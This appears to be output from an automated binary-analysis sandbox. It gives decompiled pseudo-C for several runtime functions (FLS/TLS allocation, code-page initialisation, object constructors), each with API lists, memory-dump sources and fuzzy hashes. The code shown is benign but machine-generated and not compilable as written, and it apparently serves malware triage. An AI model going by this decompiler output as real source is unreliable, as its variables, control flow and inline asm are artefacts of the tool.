                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,001B9291), ref: 001B9C4D
                                                                            Strings
                                                                            • InitializeCriticalSectionEx, xrefs: 001B9C1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                            • String ID: InitializeCriticalSectionEx
                                                                            • API String ID: 2593887523-3084827643
                                                                            • Opcode ID: 1fb2be8d3a932e8312f0011fef0695d2d65e9f48e2f2c15f5edf25bfa0244154
                                                                            • Instruction ID: f628d9db45ec248d8996dc31cdf1f5e738daa5f2d622ef8ee8dc540927db3214
                                                                            • Opcode Fuzzy Hash: 1fb2be8d3a932e8312f0011fef0695d2d65e9f48e2f2c15f5edf25bfa0244154
                                                                            • Instruction Fuzzy Hash: 7FF0B431A4121CFBCB256F50DC05DAE7FA1EF18720B014019FE0416260CB718E61D780
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 37%
                                                                            			E001B9AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				signed int _t4;
                                                                            				intOrPtr* _t6;
                                                                            				long _t7;
                                                                            				intOrPtr* _t15;
                                                                            				signed int _t17;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t4 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t4 ^ _t17;
                                                                            				_t6 = E001B9990(3, "FlsAlloc", 0x1c6040, 0x1c6048); // executed
                                                                            				_t15 = _t6;
                                                                            				if(_t15 == 0) {
                                                                            					_t7 = TlsAlloc();
                                                                            				} else {
                                                                            					 *0x1c2260(_a4);
                                                                            					_t7 =  *_t15();
                                                                            				}
                                                                            				return E001AE203(_t7, _v8 ^ _t17);
                                                                            			}










                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Alloc
                                                                            • String ID: FlsAlloc
                                                                            • API String ID: 2773662609-671089009
                                                                            • Opcode ID: 4e6d620c71962cd524cf6ec3e0bd4b0aa914cf496d75faa983c2753949793df0
                                                                            • Instruction ID: 515d05586adefd6b8ce6967dd0be968e6c60aee7f4db1a68a77e594ed8025351
                                                                            • Opcode Fuzzy Hash: 4e6d620c71962cd524cf6ec3e0bd4b0aa914cf496d75faa983c2753949793df0
                                                                            • Instruction Fuzzy Hash: FFE02B31A45218A7C731AB619C06FBFBFA4EB65B20B01005DFD0567280CF70DE51C6C5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E001B281A(void* __eflags, intOrPtr _a4) {
                                                                            				intOrPtr* _t2;
                                                                            				intOrPtr* _t6;
                                                                            
                                                                            				_t2 = E001B26F9(4, "FlsAlloc", 0x1c4394, "FlsAlloc"); // executed
                                                                            				_t6 = _t2;
                                                                            				if(_t6 == 0) {
                                                                            					return TlsAlloc();
                                                                            				}
                                                                            				L001AE2DD();
                                                                            				return  *_t6(_a4);
                                                                            			}






                                                                            APIs
                                                                            • try_get_function.LIBVCRUNTIME ref: 001B282F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: try_get_function
                                                                            • String ID: FlsAlloc
                                                                            • API String ID: 2742660187-671089009
                                                                            • Opcode ID: a2c168ae3e2edcc80fe71260738624d5aae245fcb06137679dfd72d36a722634
                                                                            • Instruction ID: 473d4338af4fe0016720bd06375c2050744312359976272fd72b4fa7f9153a28
                                                                            • Opcode Fuzzy Hash: a2c168ae3e2edcc80fe71260738624d5aae245fcb06137679dfd72d36a722634
                                                                            • Instruction Fuzzy Hash: 41D02E367893B8A3C60032C42C12FEABE889BB1BB1F050166FF0C21282C7B2880002C2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 97%
                                                                            			E001BA873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                            				signed int _v8;
                                                                            				char _v22;
                                                                            				struct _cpinfo _v28;
                                                                            				signed int _v32;
                                                                            				signed int _v36;
                                                                            				signed int _t48;
                                                                            				int _t51;
                                                                            				signed int _t54;
                                                                            				signed int _t55;
                                                                            				short _t58;
                                                                            				signed int _t60;
                                                                            				signed char _t62;
                                                                            				signed int _t63;
                                                                            				signed char* _t71;
                                                                            				signed char* _t72;
                                                                            				int _t76;
                                                                            				signed int _t79;
                                                                            				signed char* _t80;
                                                                            				short* _t81;
                                                                            				int _t85;
                                                                            				signed char _t86;
                                                                            				signed int _t87;
                                                                            				signed int _t89;
                                                                            				signed int _t90;
                                                                            				int _t92;
                                                                            				int _t93;
                                                                            				intOrPtr _t96;
                                                                            				signed int _t97;
                                                                            
                                                                            				_t48 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t48 ^ _t97;
                                                                            				_t96 = _a8;
                                                                            				_t76 = E001BA446(__eflags, _a4);
                                                                            				if(_t76 != 0) {
                                                                            					_t92 = 0;
                                                                            					__eflags = 0;
                                                                            					_t79 = 0;
                                                                            					_t51 = 0;
                                                                            					_v32 = 0;
                                                                            					while(1) {
                                                                            						__eflags =  *((intOrPtr*)(_t51 + 0x1cd828)) - _t76;
                                                                            						if( *((intOrPtr*)(_t51 + 0x1cd828)) == _t76) {
                                                                            							break;
                                                                            						}
                                                                            						_t79 = _t79 + 1;
                                                                            						_t51 = _t51 + 0x30;
                                                                            						_v32 = _t79;
                                                                            						__eflags = _t51 - 0xf0;
                                                                            						if(_t51 < 0xf0) {
                                                                            							continue;
                                                                            						} else {
                                                                            							__eflags = _t76 - 0xfde8;
                                                                            							if(_t76 == 0xfde8) {
                                                                            								L23:
                                                                            								_t60 = _t51 | 0xffffffff;
                                                                            							} else {
                                                                            								__eflags = _t76 - 0xfde9;
                                                                            								if(_t76 == 0xfde9) {
                                                                            									goto L23;
                                                                            								} else {
                                                                            									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
                                                                            									__eflags = _t51;
                                                                            									if(_t51 == 0) {
                                                                            										goto L23;
                                                                            									} else {
                                                                            										_t51 = GetCPInfo(_t76,  &_v28);
                                                                            										__eflags = _t51;
                                                                            										if(_t51 == 0) {
                                                                            											__eflags =  *0x1f0854 - _t92; // 0x0
                                                                            											if(__eflags == 0) {
                                                                            												goto L23;
                                                                            											} else {
                                                                            												E001BA4B9(_t96);
                                                                            												goto L37;
                                                                            											}
                                                                            										} else {
                                                                            											E001AE920(_t92, _t96 + 0x18, _t92, 0x101);
                                                                            											 *(_t96 + 4) = _t76;
                                                                            											 *(_t96 + 0x21c) = _t92;
                                                                            											_t76 = 1;
                                                                            											__eflags = _v28 - 1;
                                                                            											if(_v28 <= 1) {
                                                                            												 *(_t96 + 8) = _t92;
                                                                            											} else {
                                                                            												__eflags = _v22;
                                                                            												_t71 =  &_v22;
                                                                            												if(_v22 != 0) {
                                                                            													while(1) {
                                                                            														_t86 = _t71[1];
                                                                            														__eflags = _t86;
                                                                            														if(_t86 == 0) {
                                                                            															goto L16;
                                                                            														}
                                                                            														_t89 = _t86 & 0x000000ff;
                                                                            														_t87 =  *_t71 & 0x000000ff;
                                                                            														while(1) {
                                                                            															__eflags = _t87 - _t89;
                                                                            															if(_t87 > _t89) {
                                                                            																break;
                                                                            															}
                                                                            															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
                                                                            															_t87 = _t87 + 1;
                                                                            															__eflags = _t87;
                                                                            														}
                                                                            														_t71 =  &(_t71[2]);
                                                                            														__eflags =  *_t71;
                                                                            														if( *_t71 != 0) {
                                                                            															continue;
                                                                            														}
                                                                            														goto L16;
                                                                            													}
                                                                            												}
                                                                            												L16:
                                                                            												_t72 = _t96 + 0x1a;
                                                                            												_t85 = 0xfe;
                                                                            												do {
                                                                            													 *_t72 =  *_t72 | 0x00000008;
                                                                            													_t72 =  &(_t72[1]);
                                                                            													_t85 = _t85 - 1;
                                                                            													__eflags = _t85;
                                                                            												} while (_t85 != 0);
                                                                            												 *(_t96 + 0x21c) = E001BA408( *(_t96 + 4));
                                                                            												 *(_t96 + 8) = _t76;
                                                                            											}
                                                                            											_t93 = _t96 + 0xc;
                                                                            											asm("stosd");
                                                                            											asm("stosd");
                                                                            											asm("stosd");
                                                                            											L36:
                                                                            											E001BA51E(_t76, _t89, _t93, _t96, _t96); // executed
                                                                            											L37:
                                                                            											_t60 = 0;
                                                                            											__eflags = 0;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						goto L39;
                                                                            					}
                                                                            					E001AE920(_t92, _t96 + 0x18, _t92, 0x101);
                                                                            					_t54 = _v32 * 0x30;
                                                                            					__eflags = _t54;
                                                                            					_v36 = _t54;
                                                                            					_t55 = _t54 + 0x1cd838;
                                                                            					_v32 = _t55;
                                                                            					do {
                                                                            						__eflags =  *_t55;
                                                                            						_t80 = _t55;
                                                                            						if( *_t55 != 0) {
                                                                            							while(1) {
                                                                            								_t62 = _t80[1];
                                                                            								__eflags = _t62;
                                                                            								if(_t62 == 0) {
                                                                            									break;
                                                                            								}
                                                                            								_t90 =  *_t80 & 0x000000ff;
                                                                            								_t63 = _t62 & 0x000000ff;
                                                                            								while(1) {
                                                                            									__eflags = _t90 - _t63;
                                                                            									if(_t90 > _t63) {
                                                                            										break;
                                                                            									}
                                                                            									__eflags = _t90 - 0x100;
                                                                            									if(_t90 < 0x100) {
                                                                            										_t31 = _t92 + 0x1cd820; // 0x8040201
                                                                            										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
                                                                            										_t90 = _t90 + 1;
                                                                            										__eflags = _t90;
                                                                            										_t63 = _t80[1] & 0x000000ff;
                                                                            										continue;
                                                                            									}
                                                                            									break;
                                                                            								}
                                                                            								_t80 =  &(_t80[2]);
                                                                            								__eflags =  *_t80;
                                                                            								if( *_t80 != 0) {
                                                                            									continue;
                                                                            								}
                                                                            								break;
                                                                            							}
                                                                            							_t55 = _v32;
                                                                            						}
                                                                            						_t92 = _t92 + 1;
                                                                            						_t55 = _t55 + 8;
                                                                            						_v32 = _t55;
                                                                            						__eflags = _t92 - 4;
                                                                            					} while (_t92 < 4);
                                                                            					 *(_t96 + 4) = _t76;
                                                                            					 *(_t96 + 8) = 1;
                                                                            					 *(_t96 + 0x21c) = E001BA408(_t76);
                                                                            					_t81 = _t96 + 0xc;
                                                                            					_t89 = _v36 + 0x1cd82c;
                                                                            					_t93 = 6;
                                                                            					do {
                                                                            						_t58 =  *_t89;
                                                                            						_t89 = _t89 + 2;
                                                                            						 *_t81 = _t58;
                                                                            						_t81 = _t81 + 2;
                                                                            						_t93 = _t93 - 1;
                                                                            						__eflags = _t93;
                                                                            					} while (_t93 != 0);
                                                                            					goto L36;
                                                                            				} else {
                                                                            					E001BA4B9(_t96);
                                                                            					_t60 = 0;
                                                                            				}
                                                                            				L39:
                                                                            				return E001AE203(_t60, _v8 ^ _t97);
                                                                            			}

                                                                            APIs
                                                                              • Part of subcall function 001BA446: GetOEMCP.KERNEL32(00000000,?,?,001BA6CF,?), ref: 001BA471
                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001BA714,?,00000000), ref: 001BA8E7
                                                                            • GetCPInfo.KERNEL32(00000000,001BA714,?,?,?,001BA714,?,00000000), ref: 001BA8FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CodeInfoPageValid
                                                                            • String ID:
                                                                            • API String ID: 546120528-0
                                                                            • Opcode ID: f469793bdad28eaffd7b598f228ac3eaf4cc7d9e8bea72082f1b261c650a99d4
                                                                            • Instruction ID: ee047b8ed97b6087d4c2197133d03ef6117c554eb8c74b9baa9b361c729a3d91
                                                                            • Opcode Fuzzy Hash: f469793bdad28eaffd7b598f228ac3eaf4cc7d9e8bea72082f1b261c650a99d4
                                                                            • Instruction Fuzzy Hash: E3518570A003059FDB24CF31C891AFBFBE5EF01314F99802ED0968B242E7399946DB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                            			E00191382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                            				void* __esi;
                                                                            				void* _t56;
                                                                            				signed int _t62;
                                                                            				signed int _t63;
                                                                            				char _t64;
                                                                            				intOrPtr _t74;
                                                                            				intOrPtr* _t78;
                                                                            				void* _t86;
                                                                            				void* _t87;
                                                                            				intOrPtr* _t89;
                                                                            				void* _t91;
                                                                            				void* _t96;
                                                                            
                                                                            				_t96 = __eflags;
                                                                            				_t87 = __edi;
                                                                            				_t86 = __edx;
                                                                            				_t78 = __ecx;
                                                                            				E001AD870(_t56, _t91);
                                                                            				_push(_t78);
                                                                            				_t89 = _t78;
                                                                            				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
                                                                            				E0019943C(_t78);
                                                                            				 *_t89 = 0x1c22e8;
                                                                            				 *((intOrPtr*)(_t91 - 4)) = 0;
                                                                            				E00195E99(_t89 + 0x1024, _t86, _t96);
                                                                            				 *((char*)(_t91 - 4)) = 1;
                                                                            				E0019C4CA(_t89 + 0x20e8, _t86, _t96);
                                                                            				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                                                                            				E0019151B();
                                                                            				_t62 = E0019151B();
                                                                            				 *((char*)(_t91 - 4)) = 4;
                                                                            				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
                                                                            				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
                                                                            				 *(_t89 + 0x21b8) = _t63;
                                                                            				_t98 = _t63;
                                                                            				if(_t63 == 0) {
                                                                            					_t64 =  *((intOrPtr*)(_t91 + 8));
                                                                            				} else {
                                                                            					_t74 = E001AD82C(_t86, _t89, _t98, 0x82e8);
                                                                            					 *((intOrPtr*)(_t91 + 8)) = _t74;
                                                                            					 *((char*)(_t91 - 4)) = 5;
                                                                            					if(_t74 == 0) {
                                                                            						_t64 = 0;
                                                                            					} else {
                                                                            						_t64 = E0019AD1B(_t74); // executed
                                                                            					}
                                                                            				}
                                                                            				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
                                                                            				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
                                                                            				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
                                                                            				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
                                                                            				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
                                                                            				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                                                                            				 *((char*)(_t89 + 0x6cbc)) = 0;
                                                                            				 *((short*)(_t89 + 0x6cc4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
                                                                            				E001AE920(_t87, _t89 + 0x2208, 0, 0x40);
                                                                            				E001AE920(_t87, _t89 + 0x2248, 0, 0x34);
                                                                            				E001AE920(_t87, _t89 + 0x4590, 0, 0x20);
                                                                            				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
                                                                            				 *((short*)(_t89 + 0x6cfa)) = 0;
                                                                            				 *((char*)(_t89 + 0x6cd6)) = 0;
                                                                            				 *((char*)(_t89 + 0x6cf8)) = 0;
                                                                            				 *((char*)(_t89 + 0x21e0)) = 0;
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                                                            				return _t89;
                                                                            			}
















                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 00191382
                                                                              • Part of subcall function 00195E99: __EH_prolog.LIBCMT ref: 00195E9E
                                                                              • Part of subcall function 0019C4CA: __EH_prolog.LIBCMT ref: 0019C4CF
                                                                              • Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C512
                                                                              • Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C536
                                                                            • new.LIBCMT ref: 001913FA
                                                                              • Part of subcall function 0019AD1B: __EH_prolog.LIBCMT ref: 0019AD20
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 30cf798fb6a3205db3d0a814945f205ba8b9ad96e6b4af081f5a260dc9a894b8
                                                                            • Instruction ID: 4c5509c3a5128d6973943b29738408e6ac187929b30f5da500edb745277442a8
                                                                            • Opcode Fuzzy Hash: 30cf798fb6a3205db3d0a814945f205ba8b9ad96e6b4af081f5a260dc9a894b8
                                                                            • Instruction Fuzzy Hash: EA4123B0905B409EEB24CF798485AE6FBE5FF29300F504A2ED5EE83282CB326554CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 98%
                                                                            			E0019137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                            				void* __esi;
                                                                            				signed int _t62;
                                                                            				signed int _t63;
                                                                            				char _t64;
                                                                            				intOrPtr _t74;
                                                                            				intOrPtr* _t78;
                                                                            				void* _t86;
                                                                            				void* _t87;
                                                                            				intOrPtr* _t89;
                                                                            				void* _t91;
                                                                            				void* _t96;
                                                                            
                                                                            				_t96 = __eflags;
                                                                            				_t87 = __edi;
                                                                            				_t86 = __edx;
                                                                            				_t78 = __ecx;
                                                                            				E001AD870(E001C1157, _t91);
                                                                            				_push(_t78);
                                                                            				_t89 = _t78;
                                                                            				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
                                                                            				E0019943C(_t78);
                                                                            				 *_t89 = 0x1c22e8;
                                                                            				 *((intOrPtr*)(_t91 - 4)) = 0;
                                                                            				E00195E99(_t89 + 0x1024, _t86, _t96);
                                                                            				 *((char*)(_t91 - 4)) = 1;
                                                                            				E0019C4CA(_t89 + 0x20e8, _t86, _t96);
                                                                            				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                                                                            				E0019151B();
                                                                            				_t62 = E0019151B();
                                                                            				 *((char*)(_t91 - 4)) = 4;
                                                                            				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
                                                                            				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
                                                                            				 *(_t89 + 0x21b8) = _t63;
                                                                            				_t98 = _t63;
                                                                            				if(_t63 == 0) {
                                                                            					_t64 =  *((intOrPtr*)(_t91 + 8));
                                                                            				} else {
                                                                            					_t74 = E001AD82C(_t86, _t89, _t98, 0x82e8);
                                                                            					 *((intOrPtr*)(_t91 + 8)) = _t74;
                                                                            					 *((char*)(_t91 - 4)) = 5;
                                                                            					if(_t74 == 0) {
                                                                            						_t64 = 0;
                                                                            					} else {
                                                                            						_t64 = E0019AD1B(_t74); // executed
                                                                            					}
                                                                            				}
                                                                            				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
                                                                            				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
                                                                            				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
                                                                            				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
                                                                            				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
                                                                            				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
                                                                            				 *((char*)(_t89 + 0x6cbc)) = 0;
                                                                            				 *((short*)(_t89 + 0x6cc4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
                                                                            				E001AE920(_t87, _t89 + 0x2208, 0, 0x40);
                                                                            				E001AE920(_t87, _t89 + 0x2248, 0, 0x34);
                                                                            				E001AE920(_t87, _t89 + 0x4590, 0, 0x20);
                                                                            				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
                                                                            				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
                                                                            				 *((short*)(_t89 + 0x6cfa)) = 0;
                                                                            				 *((char*)(_t89 + 0x6cd6)) = 0;
                                                                            				 *((char*)(_t89 + 0x6cf8)) = 0;
                                                                            				 *((char*)(_t89 + 0x21e0)) = 0;
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
                                                                            				return _t89;
                                                                            			}















                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 00191382
                                                                              • Part of subcall function 00195E99: __EH_prolog.LIBCMT ref: 00195E9E
                                                                              • Part of subcall function 0019C4CA: __EH_prolog.LIBCMT ref: 0019C4CF
                                                                              • Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C512
                                                                              • Part of subcall function 0019C4CA: new.LIBCMT ref: 0019C536
                                                                            • new.LIBCMT ref: 001913FA
                                                                              • Part of subcall function 0019AD1B: __EH_prolog.LIBCMT ref: 0019AD20
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 4e754e16d0a942659417ddbf70b05aa291bed14db7c107f322e5d50f9e3a93a3
                                                                            • Instruction ID: b08d9e839c73f1127456f795f05438b5c21692ebfda01e1180e08a297deec75e
                                                                            • Opcode Fuzzy Hash: 4e754e16d0a942659417ddbf70b05aa291bed14db7c107f322e5d50f9e3a93a3
                                                                            • Instruction Fuzzy Hash: DC4135B0905B409EEB24DF798485AE7FBE5FF29300F504A2ED5EE83282CB326554CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E001BA6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                                                                            				char _v8;
                                                                            				char _v16;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				char _t31;
                                                                            				signed int _t36;
                                                                            				char _t40;
                                                                            				intOrPtr _t44;
                                                                            				char _t45;
                                                                            				signed int _t51;
                                                                            				void* _t64;
                                                                            				void* _t70;
                                                                            				signed int _t75;
                                                                            				void* _t81;
                                                                            
                                                                            				_t81 = __eflags;
                                                                            				_v8 = E001B8516(__ebx, __ecx, __edx);
                                                                            				E001BA7D1(__ebx, __ecx, __edx, _t81);
                                                                            				_t31 = E001BA446(_t81, _a4);
                                                                            				_v16 = _t31;
                                                                            				_t57 =  *(_v8 + 0x48);
                                                                            				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
                                                                            					return 0;
                                                                            				}
                                                                            				_push(__ebx);
                                                                            				_t70 = E001B7A8A(_t57, 0x220);
                                                                            				_t51 = __ebx | 0xffffffff;
                                                                            				__eflags = _t70;
                                                                            				if(__eflags == 0) {
                                                                            					L5:
                                                                            					_t75 = _t51;
                                                                            					goto L6;
                                                                            				} else {
                                                                            					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
                                                                            					 *_t70 =  *_t70 & 0x00000000; // executed
                                                                            					_t36 = E001BA873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
                                                                            					_t75 = _t36;
                                                                            					__eflags = _t75 - _t51;
                                                                            					if(_t75 != _t51) {
                                                                            						__eflags = _a8;
                                                                            						if(_a8 == 0) {
                                                                            							E001B7847();
                                                                            						}
                                                                            						asm("lock xadd [eax], ebx");
                                                                            						__eflags = _t51 == 1;
                                                                            						if(_t51 == 1) {
                                                                            							_t45 = _v8;
                                                                            							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0x1cdb20;
                                                                            							if( *((intOrPtr*)(_t45 + 0x48)) != 0x1cdb20) {
                                                                            								E001B7A50( *((intOrPtr*)(_t45 + 0x48)));
                                                                            							}
                                                                            						}
                                                                            						 *_t70 = 1;
                                                                            						_t64 = _t70;
                                                                            						_t70 = 0;
